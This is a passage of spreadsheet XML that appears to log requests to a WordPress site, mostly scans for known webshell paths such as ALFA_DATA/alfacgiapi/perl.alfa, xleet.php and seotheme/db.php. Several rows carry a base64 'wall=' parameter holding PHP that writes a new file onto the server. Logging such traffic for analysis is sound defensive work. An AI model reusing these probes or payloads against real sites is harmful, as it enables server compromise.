      <c r="B4628" t="s">
        <v>1412</v>
      </c>
      <c r="C4628" t="s">
        <v>688</v>
      </c>
      <c r="D4628" t="str">
        <f t="shared" si="72"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E4628" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4629" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4629" s="1">
        <v>45179.167303240742</v>
      </c>
      <c r="B4629" t="s">
        <v>1412</v>
      </c>
      <c r="C4629" t="s">
        <v>688</v>
      </c>
      <c r="D4629" t="str">
        <f t="shared" si="72"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E4629" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4630" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4630" s="1">
        <v>45178.532488425924</v>
      </c>
      <c r="B4630" t="s">
        <v>1584</v>
      </c>
      <c r="C4630" t="s">
        <v>43</v>
      </c>
      <c r="D4630" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4630" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4631" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4631" s="1">
        <v>45178.532465277778</v>
      </c>
      <c r="B4631" t="s">
        <v>1584</v>
      </c>
      <c r="C4631" t="s">
        <v>46</v>
      </c>
      <c r="D4631" t="str">
        <f t="shared" si="72"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4631" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4632" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4632" s="1">
        <v>45178.532465277778</v>
      </c>
      <c r="B4632" t="s">
        <v>1584</v>
      </c>
      <c r="C4632" t="s">
        <v>43</v>
      </c>
      <c r="D4632" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4632" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4633" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4633" s="1">
        <v>45178.532465277778</v>
      </c>
      <c r="B4633" t="s">
        <v>1584</v>
      </c>
      <c r="C4633" t="s">
        <v>45</v>
      </c>
      <c r="D4633" t="str">
        <f t="shared" si="72"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4633" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4634" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4634" s="1">
        <v>45178.37699074074</v>
      </c>
      <c r="B4634" t="s">
        <v>1585</v>
      </c>
      <c r="C4634" t="s">
        <v>46</v>
      </c>
      <c r="D4634" t="str">
        <f t="shared" si="72"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4634" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4635" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4635" s="1">
        <v>45178.37699074074</v>
      </c>
      <c r="B4635" t="s">
        <v>1585</v>
      </c>
      <c r="C4635" t="s">
        <v>43</v>
      </c>
      <c r="D4635" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4635" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4636" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4636" s="1">
        <v>45178.37699074074</v>
      </c>
      <c r="B4636" t="s">
        <v>1585</v>
      </c>
      <c r="C4636" t="s">
        <v>45</v>
      </c>
      <c r="D4636" t="str">
        <f t="shared" si="72"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4636" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4637" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4637" s="1">
        <v>45178.37699074074</v>
      </c>
      <c r="B4637" t="s">
        <v>1585</v>
      </c>
      <c r="C4637" t="s">
        <v>43</v>
      </c>
      <c r="D4637" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4637" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4638" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4638" s="1">
        <v>45177.449421296296</v>
      </c>
      <c r="B4638" t="s">
        <v>1586</v>
      </c>
      <c r="C4638" t="s">
        <v>43</v>
      </c>
      <c r="D4638" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4638" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4639" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4639" s="1">
        <v>45175.530891203707</v>
      </c>
      <c r="B4639" t="s">
        <v>1409</v>
      </c>
      <c r="C4639" t="s">
        <v>358</v>
      </c>
      <c r="D4639" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4639" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4640" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4640" s="1">
        <v>45175.530844907407</v>
      </c>
      <c r="B4640" t="s">
        <v>1409</v>
      </c>
      <c r="C4640" t="s">
        <v>373</v>
      </c>
      <c r="D4640" t="str">
        <f t="shared" si="72"/>
        <v>simple.php</v>
      </c>
      <c r="E4640" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4641" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4641" s="1">
        <v>45175.530798611115</v>
      </c>
      <c r="B4641" t="s">
        <v>1409</v>
      </c>
      <c r="C4641" t="s">
        <v>1587</v>
      </c>
      <c r="D4641" t="str">
        <f t="shared" si="72"/>
        <v>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2h6cG9pLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</v>
      </c>
      <c r="E4641" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4642" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4642" s="1">
        <v>45175.481944444444</v>
      </c>
      <c r="B4642" t="s">
        <v>1365</v>
      </c>
      <c r="C4642" t="s">
        <v>1588</v>
      </c>
      <c r="D4642" t="str">
        <f t="shared" si="72"/>
        <v>batm.php</v>
      </c>
      <c r="E4642" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4643" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4643" s="1">
        <v>45175.481932870367</v>
      </c>
      <c r="B4643" t="s">
        <v>1365</v>
      </c>
      <c r="C4643" t="s">
        <v>1589</v>
      </c>
      <c r="D4643" t="str">
        <f t="shared" si="72"/>
        <v>504.php</v>
      </c>
      <c r="E4643" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4644" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4644" s="1">
        <v>45175.481921296298</v>
      </c>
      <c r="B4644" t="s">
        <v>1365</v>
      </c>
      <c r="C4644" t="s">
        <v>1590</v>
      </c>
      <c r="D4644" t="str">
        <f t="shared" si="72"/>
        <v>444.php</v>
      </c>
      <c r="E4644" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4645" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4645" s="1">
        <v>45175.334317129629</v>
      </c>
      <c r="B4645" t="s">
        <v>1591</v>
      </c>
      <c r="C4645" t="s">
        <v>1592</v>
      </c>
      <c r="D4645" t="str">
        <f t="shared" si="72"/>
        <v>hoohgfqd.php?Fox=d3wL7</v>
      </c>
      <c r="E4645" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4646" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4646" s="1">
        <v>45175.334282407406</v>
      </c>
      <c r="B4646" t="s">
        <v>1591</v>
      </c>
      <c r="C4646" t="s">
        <v>41</v>
      </c>
      <c r="D4646" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4646" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4647" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4647" s="1">
        <v>45175.33425925926</v>
      </c>
      <c r="B4647" t="s">
        <v>1591</v>
      </c>
      <c r="C4647" t="s">
        <v>43</v>
      </c>
      <c r="D4647" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4647" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4648" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4648" s="1">
        <v>45175.334201388891</v>
      </c>
      <c r="B4648" t="s">
        <v>1591</v>
      </c>
      <c r="C4648" t="s">
        <v>1593</v>
      </c>
      <c r="D4648" t="str">
        <f t="shared" si="72"/>
        <v>pbkhvbsc.php?Fox=d3wL7</v>
      </c>
      <c r="E4648" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4649" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4649" s="1">
        <v>45175.334189814814</v>
      </c>
      <c r="B4649" t="s">
        <v>1591</v>
      </c>
      <c r="C4649" t="s">
        <v>41</v>
      </c>
      <c r="D4649" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4649" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4650" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4650" s="1">
        <v>45175.334178240744</v>
      </c>
      <c r="B4650" t="s">
        <v>1591</v>
      </c>
      <c r="C4650" t="s">
        <v>45</v>
      </c>
      <c r="D4650" t="str">
        <f t="shared" si="72"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4650" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4651" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4651" s="1">
        <v>45175.334155092591</v>
      </c>
      <c r="B4651" t="s">
        <v>1591</v>
      </c>
      <c r="C4651" t="s">
        <v>46</v>
      </c>
      <c r="D4651" t="str">
        <f t="shared" si="72"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4651" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4652" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4652" s="1">
        <v>45175.334155092591</v>
      </c>
      <c r="B4652" t="s">
        <v>1591</v>
      </c>
      <c r="C4652" t="s">
        <v>43</v>
      </c>
      <c r="D4652" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4652" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4653" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4653" s="1">
        <v>45175.037256944444</v>
      </c>
      <c r="B4653" t="s">
        <v>1409</v>
      </c>
      <c r="C4653" t="s">
        <v>353</v>
      </c>
      <c r="D4653" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4653" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4654" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4654" s="1">
        <v>45175.037187499998</v>
      </c>
      <c r="B4654" t="s">
        <v>1409</v>
      </c>
      <c r="C4654" t="s">
        <v>317</v>
      </c>
      <c r="D4654" t="str">
        <f t="shared" si="72"/>
        <v>simple.php</v>
      </c>
      <c r="E4654" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4655" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4655" s="1">
        <v>45175.037060185183</v>
      </c>
      <c r="B4655" t="s">
        <v>1409</v>
      </c>
      <c r="C4655" t="s">
        <v>1594</v>
      </c>
      <c r="D4655" t="str">
        <f t="shared" si="72"/>
        <v>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Z0bGp0LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</v>
      </c>
      <c r="E4655" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4656" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4656" s="1">
        <v>45174.865891203706</v>
      </c>
      <c r="B4656" t="s">
        <v>1292</v>
      </c>
      <c r="C4656" t="s">
        <v>298</v>
      </c>
      <c r="D4656" t="str">
        <f t="shared" si="72"/>
        <v>inputs.php</v>
      </c>
      <c r="E4656" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4657" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4657" s="1">
        <v>45174.865428240744</v>
      </c>
      <c r="B4657" t="s">
        <v>1292</v>
      </c>
      <c r="C4657" t="s">
        <v>353</v>
      </c>
      <c r="D4657" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4657" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4658" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4658" s="1">
        <v>45174.627766203703</v>
      </c>
      <c r="B4658" t="s">
        <v>1595</v>
      </c>
      <c r="C4658" t="s">
        <v>43</v>
      </c>
      <c r="D4658" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4658" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4659" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4659" s="1">
        <v>45174.627743055556</v>
      </c>
      <c r="B4659" t="s">
        <v>1595</v>
      </c>
      <c r="C4659" t="s">
        <v>43</v>
      </c>
      <c r="D4659" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4659" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4660" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4660" s="1">
        <v>45174.483090277776</v>
      </c>
      <c r="B4660" t="s">
        <v>492</v>
      </c>
      <c r="C4660" t="s">
        <v>5</v>
      </c>
      <c r="D4660" t="str">
        <f t="shared" si="72"/>
        <v/>
      </c>
      <c r="E4660" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="4661" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4661" s="1">
        <v>45174.481712962966</v>
      </c>
      <c r="B4661" t="s">
        <v>491</v>
      </c>
      <c r="C4661" t="s">
        <v>5</v>
      </c>
      <c r="D4661" t="str">
        <f t="shared" si="72"/>
        <v/>
      </c>
      <c r="E4661" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="4662" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4662" s="1">
        <v>45173.551747685182</v>
      </c>
      <c r="B4662" t="s">
        <v>1292</v>
      </c>
      <c r="C4662" t="s">
        <v>298</v>
      </c>
      <c r="D4662" t="str">
        <f t="shared" si="72"/>
        <v>inputs.php</v>
      </c>
      <c r="E4662" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4663" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4663" s="1">
        <v>45173.551435185182</v>
      </c>
      <c r="B4663" t="s">
        <v>1292</v>
      </c>
      <c r="C4663" t="s">
        <v>353</v>
      </c>
      <c r="D4663" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4663" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4664" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4664" s="1">
        <v>45173.001550925925</v>
      </c>
      <c r="B4664" t="s">
        <v>1596</v>
      </c>
      <c r="C4664" t="s">
        <v>43</v>
      </c>
      <c r="D4664" t="str">
        <f t="shared" si="72"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4664" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4665" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4665" s="1">
        <v>45172.367962962962</v>
      </c>
      <c r="B4665" t="s">
        <v>1408</v>
      </c>
      <c r="C4665" t="s">
        <v>353</v>
      </c>
      <c r="D4665" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4665" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4666" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4666" s="1">
        <v>45172.367847222224</v>
      </c>
      <c r="B4666" t="s">
        <v>1408</v>
      </c>
      <c r="C4666" t="s">
        <v>317</v>
      </c>
      <c r="D4666" t="str">
        <f t="shared" si="72"/>
        <v>simple.php</v>
      </c>
      <c r="E4666" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4667" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4667" s="1">
        <v>45172.367708333331</v>
      </c>
      <c r="B4667" t="s">
        <v>1408</v>
      </c>
      <c r="C4667" t="s">
        <v>1597</v>
      </c>
      <c r="D4667" t="str">
        <f t="shared" si="72"/>
        <v>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2F1Z2FwLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</v>
      </c>
      <c r="E4667" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4668" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4668" s="1">
        <v>45171.898136574076</v>
      </c>
      <c r="B4668" t="s">
        <v>1408</v>
      </c>
      <c r="C4668" t="s">
        <v>353</v>
      </c>
      <c r="D4668" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4668" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4669" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4669" s="1">
        <v>45171.883229166669</v>
      </c>
      <c r="B4669" t="s">
        <v>1232</v>
      </c>
      <c r="C4669" t="s">
        <v>5</v>
      </c>
      <c r="D4669" t="str">
        <f t="shared" si="72"/>
        <v/>
      </c>
      <c r="E4669" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="4670" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4670" s="1">
        <v>45171.83353009259</v>
      </c>
      <c r="B4670" t="s">
        <v>1598</v>
      </c>
      <c r="C4670" t="s">
        <v>5</v>
      </c>
      <c r="D4670" t="str">
        <f t="shared" si="72"/>
        <v/>
      </c>
      <c r="E4670" t="s">
        <v>1582</v>
      </c>
    </row>
    <row r="4671" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4671" s="1">
        <v>45171.223437499997</v>
      </c>
      <c r="B4671" t="s">
        <v>1292</v>
      </c>
      <c r="C4671" t="s">
        <v>298</v>
      </c>
      <c r="D4671" t="str">
        <f t="shared" si="72"/>
        <v>inputs.php</v>
      </c>
      <c r="E4671" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4672" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4672" s="1">
        <v>45171.22283564815</v>
      </c>
      <c r="B4672" t="s">
        <v>1292</v>
      </c>
      <c r="C4672" t="s">
        <v>353</v>
      </c>
      <c r="D4672" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4672" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4673" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4673" s="1">
        <v>45171.126215277778</v>
      </c>
      <c r="B4673" t="s">
        <v>1292</v>
      </c>
      <c r="C4673" t="s">
        <v>508</v>
      </c>
      <c r="D4673" t="str">
        <f t="shared" si="72"/>
        <v>inputs.php</v>
      </c>
      <c r="E4673" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4674" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4674" s="1">
        <v>45171.12599537037</v>
      </c>
      <c r="B4674" t="s">
        <v>1292</v>
      </c>
      <c r="C4674" t="s">
        <v>358</v>
      </c>
      <c r="D4674" t="str">
        <f t="shared" ref="D4674:D4737" si="73">MID(C4674,FIND("#", SUBSTITUTE(C4674, "/", "#", 3))+1,LEN(C4674)-FIND("#", SUBSTITUTE(C4674, "/", "#", 3))+1)</f>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4674" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4675" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4675" s="1">
        <v>45170.806875000002</v>
      </c>
      <c r="B4675" t="s">
        <v>1599</v>
      </c>
      <c r="C4675" t="s">
        <v>298</v>
      </c>
      <c r="D4675" t="str">
        <f t="shared" si="73"/>
        <v>inputs.php</v>
      </c>
      <c r="E4675" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4676" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4676" s="1">
        <v>45170.806608796294</v>
      </c>
      <c r="B4676" t="s">
        <v>1599</v>
      </c>
      <c r="C4676" t="s">
        <v>298</v>
      </c>
      <c r="D4676" t="str">
        <f t="shared" si="73"/>
        <v>inputs.php</v>
      </c>
      <c r="E4676" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4677" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4677" s="1">
        <v>45170.317037037035</v>
      </c>
      <c r="B4677" t="s">
        <v>1600</v>
      </c>
      <c r="C4677" t="s">
        <v>1249</v>
      </c>
      <c r="D4677" t="str">
        <f t="shared" si="73"/>
        <v>style.php?sig=update&amp;domain=51.79.124.111</v>
      </c>
      <c r="E4677" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4678" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4678" s="1">
        <v>45169.972511574073</v>
      </c>
      <c r="B4678" t="s">
        <v>1292</v>
      </c>
      <c r="C4678" t="s">
        <v>298</v>
      </c>
      <c r="D4678" t="str">
        <f t="shared" si="73"/>
        <v>inputs.php</v>
      </c>
      <c r="E4678" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4679" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4679" s="1">
        <v>45169.972372685188</v>
      </c>
      <c r="B4679" t="s">
        <v>1292</v>
      </c>
      <c r="C4679" t="s">
        <v>353</v>
      </c>
      <c r="D4679" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4679" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4680" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4680" s="1">
        <v>45169.950162037036</v>
      </c>
      <c r="B4680" t="s">
        <v>1302</v>
      </c>
      <c r="C4680" t="s">
        <v>298</v>
      </c>
      <c r="D4680" t="str">
        <f t="shared" si="73"/>
        <v>inputs.php</v>
      </c>
      <c r="E4680" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4681" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4681" s="1">
        <v>45169.949791666666</v>
      </c>
      <c r="B4681" t="s">
        <v>1302</v>
      </c>
      <c r="C4681" t="s">
        <v>353</v>
      </c>
      <c r="D4681" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4681" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4682" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4682" s="1">
        <v>45169.894907407404</v>
      </c>
      <c r="B4682" t="s">
        <v>1485</v>
      </c>
      <c r="C4682" t="s">
        <v>298</v>
      </c>
      <c r="D4682" t="str">
        <f t="shared" si="73"/>
        <v>inputs.php</v>
      </c>
      <c r="E4682" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4683" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4683" s="1">
        <v>45169.894872685189</v>
      </c>
      <c r="B4683" t="s">
        <v>1485</v>
      </c>
      <c r="C4683" t="s">
        <v>353</v>
      </c>
      <c r="D4683" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4683" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4684" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4684" s="1">
        <v>45169.523229166669</v>
      </c>
      <c r="B4684" t="s">
        <v>1295</v>
      </c>
      <c r="C4684" t="s">
        <v>1601</v>
      </c>
      <c r="D4684" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/plugins/easybusy/xleet.php</v>
      </c>
      <c r="E4684" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4685" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4685" s="1">
        <v>45169.522986111115</v>
      </c>
      <c r="B4685" t="s">
        <v>1295</v>
      </c>
      <c r="C4685" t="s">
        <v>1602</v>
      </c>
      <c r="D4685" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/plugins/rxr/rx.php</v>
      </c>
      <c r="E4685" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4686" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4686" s="1">
        <v>45169.522719907407</v>
      </c>
      <c r="B4686" t="s">
        <v>1295</v>
      </c>
      <c r="C4686" t="s">
        <v>353</v>
      </c>
      <c r="D4686" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4686" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4687" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4687" s="1">
        <v>45169.42</v>
      </c>
      <c r="B4687" t="s">
        <v>1603</v>
      </c>
      <c r="C4687" t="s">
        <v>1604</v>
      </c>
      <c r="D4687" t="str">
        <f t="shared" si="73"/>
        <v>trlpqaon.php?Fox=d3wL7</v>
      </c>
      <c r="E4687" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4688" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4688" s="1">
        <v>45169.419988425929</v>
      </c>
      <c r="B4688" t="s">
        <v>1603</v>
      </c>
      <c r="C4688" t="s">
        <v>41</v>
      </c>
      <c r="D4688" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4688" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4689" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4689" s="1">
        <v>45169.419976851852</v>
      </c>
      <c r="B4689" t="s">
        <v>1603</v>
      </c>
      <c r="C4689" t="s">
        <v>43</v>
      </c>
      <c r="D4689" t="str">
        <f t="shared" si="73"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4689" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4690" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4690" s="1">
        <v>45169.419965277775</v>
      </c>
      <c r="B4690" t="s">
        <v>1603</v>
      </c>
      <c r="C4690" t="s">
        <v>1605</v>
      </c>
      <c r="D4690" t="str">
        <f t="shared" si="73"/>
        <v>yfvpzlyz.php?Fox=d3wL7</v>
      </c>
      <c r="E4690" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4691" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4691" s="1">
        <v>45169.419953703706</v>
      </c>
      <c r="B4691" t="s">
        <v>1603</v>
      </c>
      <c r="C4691" t="s">
        <v>41</v>
      </c>
      <c r="D4691" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4691" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4692" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4692" s="1">
        <v>45169.419953703706</v>
      </c>
      <c r="B4692" t="s">
        <v>1603</v>
      </c>
      <c r="C4692" t="s">
        <v>45</v>
      </c>
      <c r="D4692" t="str">
        <f t="shared" si="73"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4692" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4693" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4693" s="1">
        <v>45169.419942129629</v>
      </c>
      <c r="B4693" t="s">
        <v>1603</v>
      </c>
      <c r="C4693" t="s">
        <v>46</v>
      </c>
      <c r="D4693" t="str">
        <f t="shared" si="73"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4693" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4694" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4694" s="1">
        <v>45169.419942129629</v>
      </c>
      <c r="B4694" t="s">
        <v>1603</v>
      </c>
      <c r="C4694" t="s">
        <v>43</v>
      </c>
      <c r="D4694" t="str">
        <f t="shared" si="73"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4694" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4695" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4695" s="1">
        <v>45169.311261574076</v>
      </c>
      <c r="B4695" t="s">
        <v>1359</v>
      </c>
      <c r="C4695" t="s">
        <v>508</v>
      </c>
      <c r="D4695" t="str">
        <f t="shared" si="73"/>
        <v>inputs.php</v>
      </c>
      <c r="E4695" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4696" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4696" s="1">
        <v>45169.311238425929</v>
      </c>
      <c r="B4696" t="s">
        <v>1359</v>
      </c>
      <c r="C4696" t="s">
        <v>358</v>
      </c>
      <c r="D4696" t="str">
        <f t="shared" si="73"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4696" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4697" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4697" s="1">
        <v>45169.010358796295</v>
      </c>
      <c r="B4697" t="s">
        <v>1606</v>
      </c>
      <c r="C4697" t="s">
        <v>1249</v>
      </c>
      <c r="D4697" t="str">
        <f t="shared" si="73"/>
        <v>style.php?sig=update&amp;domain=51.79.124.111</v>
      </c>
      <c r="E4697" t="s">
        <v>13</v>
      </c>
